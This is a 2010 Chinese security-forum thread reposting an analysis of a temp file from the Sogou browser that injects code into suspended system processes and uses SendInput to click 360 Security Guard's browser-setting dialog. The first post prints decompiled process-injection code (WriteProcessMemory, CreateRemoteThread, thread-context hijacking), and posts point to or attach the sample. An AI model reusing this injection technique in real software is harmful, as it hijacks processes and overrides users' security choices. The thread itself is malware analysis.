看雪软件安全论坛



返回   看雪软件安全论坛 > 软件安全 > 『安全编程论坛』

『安全编程论坛』 原『Win32/Win64编程』 版块,讨论编程技术,稍侧重安全技术相关的编程

发表新主题 回复
 
主题工具 显示模式
linyud
级别:2 | 在线时长:16小时 | 升级还需:5小时级别:2 | 在线时长:16小时 | 升级还需:5小时

初级会员
初级会员

资 料:
注册日期: Oct 2008
帖子: 51 linyud 普普通通
精华: 0
现金: 204 Kx
1 旧 2010-02-06, 15:40:25 默认 【转帖】[分析] 搜狗浏览器点击360弹窗 微点拦截未知间谍
linyud 当前离线

搜狗浏览器修改360安全卫士默认浏览器修改拦截弹框判断结果被微点报为木马
作者:ooxxvsxxoo    2009-12-18 13:50

使用搜狗拼音的时候提示下载安装搜狗浏览器, 一时好奇, 装一个呗.

装完后机器上的微点报有木马, 仔细一看报的是搜狗浏览器主进程生成的一个tmp文件.

http://mpicture.micropoint.com.cn/getpic.asp?sid=d20b99b0362eb69d3a3d375ccc1352bb

这是咋回事情呢? 自己的机器一直很干净, 不可能被感染啊...

IDA此TMP...

http://mpicture.micropoint.com.cn/getpic.asp?sid=3379ddda5c443e1a693ff3434186fbcc

嗯 call sub_4011C3, 点进去看看.

if ( SHGetFolderPathW(0, 38, 0, 0, &String2) )
    lstrcpyW(&String2, L"C:\\Program Files");
lstrcpyW(&Data, &String2);
lstrcatW(&Data, L"\\360\\360se3\\360SE.exe");
hKey = 0;
if ( !RegOpenKeyW(HKEY_CLASSES_ROOT, L"Applications\\360SE.exe\\shell\\open\\command", &hKey) )
{
    cbData = 260;
    RegQueryValueExW(hKey, 0, 0, 0, (BYTE *)&Data, &cbData);
}
lstrcpyW(&String1, &String2);
lstrcatW(&String1, L"\\Internet Explorer\\iexplore.exe");
v13 = &String1;
v14 = L"notepad.exe";
v15 = L"calc.exe";
v16 = L"cmd.exe";
v17 = L"regedit.exe";
v18 = L"ctfmon.exe";
v19 = L"osk.exe";
v20 = L"explorer.exe";
v21 = &Data;
v2 = 0;
do
{
    wsprintfW(&CommandLine, L"\"%s\"", (&v14)[2 * v2]);
    v4 = 68;
    v3 = &StartupInfo;
    do
    {
      LOBYTE(v3->cb) = 0;
      v3 = (struct _STARTUPINFOW *)((char *)v3 + 1);
      --v4;
    }
    while ( v4 );
    StartupInfo.cb = 68;
    v6 = 16;
    v5 = &ProcessInformation;
    do
    {
      LOBYTE(v5->hProcess) = 0;
      v5 = (struct _PROCESS_INFORMATION *)((char *)v5 + 1);
      --v6;
    }
    while ( v6 );
    result = CreateProcessW(0, &CommandLine, 0, 0, 0, 0x8000004u, 0, 0, &StartupInfo, &ProcessInformation);
    if ( result )
    {
      result = sub_401000(ProcessInformation.hProcess, ProcessInformation.hThread, lpBuffer, a2);
      if ( (_BYTE)result )
        return result;
      result = TerminateProcess(ProcessInformation.hProcess, 0);
    }
    ++v2;
}
while ( v2 < 9 );
return result;
}

哈哈 强大的F5啊. 

原来搜狗和360开战了, 判断下有没有\\360\\360se3\\360SE.exe 360安全浏览器.

如果有的话就调用这些系统进程.

v14 = L"notepad.exe";
v15 = L"calc.exe";
v16 = L"cmd.exe";
v17 = L"regedit.exe";
v18 = L"ctfmon.exe";
v19 = L"osk.exe";
v20 = L"explorer.exe";

然后

if ( NumberOfBytesWritten == 12
    && (WriteProcessMemory(v9, lpStartAddress, dword_403010, 0x40u, &NumberOfBytesWritten), NumberOfBytesWritten == 64)
    && (WriteProcessMemory(v9, v16, lpBuffer, v5, &NumberOfBytesWritten), NumberOfBytesWritten == v5)
    && (v10 = (DWORD)lpStartAddress, CreateRemoteThread(v9, 0, 0, lpStartAddress, 0, 0, 0)) )
{
    Context.ContextFlags = 65599;
    if ( GetThreadContext(hThread, &Context) )
    {
      Context.Eip = v10;
      SetThreadContext(hThread, &Context);
      ResumeThread(hThread);
    }
    result = 1;
}

嗯 GetThreadContext WriteProcessMemory 猥琐流 改变notepad.exe等的程序执行, 怪不得会被微点报木马了.

v29 = GetProcAddress(v13, "SendInput");

搜狗费了这么大的劲来改变notepad.exe的执行顺序, 想干嘛呢?

功力不够, 看不出来了 还是试试看吧.

不懈努力下, 终于搞明白了.

注意图中的红圈, 那是鼠标点击动作.

《搜狗浏览器点击360弹窗》 视频:http://www.tudou.com/programs/view/iD9jtUfeLTs

原来搜狗在用Sendinput点击卫士的默认浏览器修改弹窗.

唉... 有这精力干点啥不好, 非得去攻击别人的软件, 得 被微点报木马了吧.

赶紧卸载先了...

tmp 文件下载地址, 有兴趣的牛人们可以自己看看, 很好玩.

hXXp://www.fileupyours.com/view/269795/xx.zip
(文件链接现已失效)


最近读者: 360_aijevol  360_MJ0011

回复时引用此帖 返回顶端
菊冬
级别:7 | 在线时长:91小时 | 升级还需:5小时级别:7 | 在线时长:91小时 | 升级还需:5小时级别:7 | 在线时长:91小时 | 升级还需:5小时级别:7 | 在线时长:91小时 | 升级还需:5小时

初级会员
初级会员

资 料:
注册日期: Dec 2008
帖子: 75 菊冬 品行端正
精华: 0
现金: 220 Kx
2 旧 2010-02-06, 19:03:12 默认
菊冬 当前离线

恩,搜狗浏览器很早就这样干了. 流氓,非常无耻! 
还有个什么计划任务天天升级来着,和QQ输入法作对的.

回复时引用此帖 返回顶端
superleft
级别:6 | 在线时长:72小时 | 升级还需:5小时级别:6 | 在线时长:72小时 | 升级还需:5小时级别:6 | 在线时长:72小时 | 升级还需:5小时

superleft 的头像

初级会员
初级会员

资 料:
注册日期: May 2007
帖子: 44 superleft 品行端正
精华: 0
现金: 222 Kx
3 旧 2010-02-06, 21:16:28 默认
superleft 当前离线

搜狗浏览器可没机会天天开机问你, 是否将免费的搜狗浏览器设置为默认浏览器?

回复时引用此帖 返回顶端
liangdong
级别:27 | 在线时长:855小时 | 升级还需:41小时级别:27 | 在线时长:855小时 | 升级还需:41小时级别:27 | 在线时长:855小时 | 升级还需:41小时级别:27 | 在线时长:855小时 | 升级还需:41小时级别:27 | 在线时长:855小时 | 升级还需:41小时级别:27 | 在线时长:855小时 | 升级还需:41小时

初级会员
初级会员

资 料:
注册日期: Apr 2008
帖子: 155 liangdong 品行端正
精华: 0
现金: 742 Kx
4 旧 2010-02-07, 10:28:47 默认
liangdong 当前离线

........................

此帖于 2010-02-07 15:14:08 被 liangdong 最后编辑
回复时引用此帖 返回顶端
hmilywen
级别:18 | 在线时长:424小时 | 升级还需:13小时级别:18 | 在线时长:424小时 | 升级还需:13小时级别:18 | 在线时长:424小时 | 升级还需:13小时

初级会员
初级会员

资 料:
注册日期: Apr 2007
帖子: 359 hmilywen 品行端正
精华: 0
现金: 318 Kx
5 旧 2010-02-07, 19:40:03 默认
hmilywen 当前离线

搜狗真流氓!

回复时引用此帖 返回顶端
linyud
级别:2 | 在线时长:16小时 | 升级还需:5小时级别:2 | 在线时长:16小时 | 升级还需:5小时

初级会员
初级会员

资 料:
注册日期: Oct 2008
帖子: 51 linyud 普普通通
精华: 0
现金: 204 Kx
6 旧 2010-02-11, 00:47:20 默认
linyud 当前离线

搜狗真的太流氓了简直和病毒一样了。

回复时引用此帖 返回顶端
海风月影
级别:37 | 在线时长:1531小时 | 升级还需:65小时级别:37 | 在线时长:1531小时 | 升级还需:65小时级别:37 | 在线时长:1531小时 | 升级还需:65小时级别:37 | 在线时长:1531小时 | 升级还需:65小时

海风月影 的头像

高级会员
高级会员

资 料:
注册日期: Apr 2004
帖子: 1,955 海风月影 品行端正
精华: 14
现金: 488 Kx
7 旧 2010-02-11, 09:10:16 默认
海风月影 当前离线

原版在哪?网上为什么搜不到 作者:ooxxvsxxoo 的BLOG?

回复时引用此帖 返回顶端
linyud
级别:2 | 在线时长:16小时 | 升级还需:5小时级别:2 | 在线时长:16小时 | 升级还需:5小时

初级会员
初级会员

资 料:
注册日期: Oct 2008
帖子: 51 linyud 普普通通
精华: 0
现金: 204 Kx
8 旧 2010-02-11, 09:42:58 默认
linyud 当前离线

“搜狗做的是合法的病毒” 任何杀毒软件都不会去查杀的。无敌了~

回复时引用此帖 返回顶端
liangdong
级别:27 | 在线时长:855小时 | 升级还需:41小时级别:27 | 在线时长:855小时 | 升级还需:41小时级别:27 | 在线时长:855小时 | 升级还需:41小时级别:27 | 在线时长:855小时 | 升级还需:41小时级别:27 | 在线时长:855小时 | 升级还需:41小时级别:27 | 在线时长:855小时 | 升级还需:41小时

初级会员
初级会员

资 料:
注册日期: Apr 2008
帖子: 155 liangdong 品行端正
精华: 0
现金: 742 Kx
9 旧 2010-02-11, 09:55:56 默认
liangdong 当前离线

引用:
最初由 海风月影发布 查看帖子
原版在哪?网上为什么搜不到 作者:ooxxvsxxoo 的BLOG?
http://hi.baidu.com/ooxxvsxxoo/blog
以前某论坛还有一个更详细的分析,那个还用windbg分析了注入后的动作,不过现在已经找不到了。

此帖于 2010-02-11 12:34:42 被 liangdong 最后编辑
回复时引用此帖 返回顶端
海风月影
级别:37 | 在线时长:1531小时 | 升级还需:65小时级别:37 | 在线时长:1531小时 | 升级还需:65小时级别:37 | 在线时长:1531小时 | 升级还需:65小时级别:37 | 在线时长:1531小时 | 升级还需:65小时

海风月影 的头像

高级会员
高级会员

资 料:
注册日期: Apr 2004
帖子: 1,955 海风月影 品行端正
精华: 14
现金: 488 Kx
10 旧 2010-02-11, 10:36:55 默认
海风月影 当前离线

好像重现不了了,可惜看不到精彩画面

回复时引用此帖 返回顶端
hldgaofeng
级别:12 | 在线时长:199小时 | 升级还需:22小时级别:12 | 在线时长:199小时 | 升级还需:22小时级别:12 | 在线时长:199小时 | 升级还需:22小时

hldgaofeng 的头像

初级会员
初级会员

资 料:
注册日期: Oct 2004
帖子: 61 hldgaofeng 品行端正
精华: 0
现金: 238 Kx
11 旧 2010-02-11, 11:04:47 默认
hldgaofeng 当前离线

真TMD恶心!!! 这些年深受其害!!!

回复时引用此帖 返回顶端
飘祺
级别:30 | 在线时长:1032小时 | 升级还需:53小时级别:30 | 在线时长:1032小时 | 升级还需:53小时级别:30 | 在线时长:1032小时 | 升级还需:53小时级别:30 | 在线时长:1032小时 | 升级还需:53小时级别:30 | 在线时长:1032小时 | 升级还需:53小时级别:30 | 在线时长:1032小时 | 升级还需:53小时

飘祺 的头像

初级会员
初级会员

资 料:
注册日期: Dec 2008
帖子: 45 飘祺 品行端正
精华: 0
现金: 724 Kx
12 旧 2010-02-11, 16:14:04 默认
飘祺 当前在线

现在的软件真是让人担忧啊  什么 输入法 播放器 浏览器 等
而且总是口水

回复时引用此帖 返回顶端
loveqqc
级别:7 | 在线时长:82小时 | 升级还需:14小时级别:7 | 在线时长:82小时 | 升级还需:14小时级别:7 | 在线时长:82小时 | 升级还需:14小时级别:7 | 在线时长:82小时 | 升级还需:14小时

初级会员
初级会员

资 料:
注册日期: Apr 2007
帖子: 114 loveqqc 品行端正
精华: 0
现金: 262 Kx
13 旧 2010-02-13, 22:59:34 默认
loveqqc 当前离线

都不是好鸟啊

回复时引用此帖 返回顶端
kman
级别:3 | 在线时长:24小时 | 升级还需:8小时级别:3 | 在线时长:24小时 | 升级还需:8小时级别:3 | 在线时长:24小时 | 升级还需:8小时

初级会员
初级会员

资 料:
注册日期: Apr 2008
帖子: 17 kman 品行端正
精华: 0
现金: 202 Kx
14 旧 2010-02-28, 16:11:46 默认
美女 kman 当前离线

嗯 这个tmp文件我下载到了. 
确实有这么回事, 大家玩玩吧. 
期待高人逆向之...

------下载此贴附件最少需要拥有2Kx,方有下载权限。------
上传的附件
文件类型: zip ~F420.zip (1.6 KB, 4 次下载) 下载此附件需要消耗2Kx,下载中会自动扣除。
回复时引用此帖 返回顶端
寻找奇点
级别:1 | 在线时长:7小时 | 升级还需:5小时

初级会员
初级会员

资 料:
注册日期: Feb 2008
帖子: 19 寻找奇点 品行端正
精华: 0
现金: 206 Kx
15 旧 2010-02-28, 16:25:26 默认
帅哥 寻找奇点 当前离线

原来搜狗这么流氓     以前用它还是因为有个免费教育网代理  现在看看还是算了吧

回复时引用此帖 返回顶端
发表新主题 回复

书签

主题工具
显示模式

发帖规则
不可以发表新主题
不可以发表回复
不可以上传附件
不可以编辑自己的帖子
论坛启用 BB 代码
论坛启用 表情符号
论坛跳转

相似的主题
主题 主题作者 版面 回复 最后发表
虚拟机 【转帖】VMProtect 逆向分析 Bughoho 『软件调试论坛』 43 2009-08-22 09:55:08
【转帖】PPTCM算法分析 恋香 『经典问答』 2 2009-05-30 10:08:08
【转帖】ntldr分析 鸡蛋壳 『安全编程论坛』 5 2007-12-08 14:39:37
【转帖】爆破经验谈 算法分析 vpik 『求助问答区』 3 2007-08-30 23:15:29
【转帖】一个CrackMe请大家分析 zhangzhan 『CrackMe◇ReverseMe』 4 2007-07-24 19:54:58


所有时间均为北京时间。现在的时间是 22:09:44


©2000-2010 PEdiy.com All rights reserved.By PEDIY
Powered by vBulletin ®Jelsoft Enterprises Ltd. 增强包制作PHP源动力.界面支持standme Studio.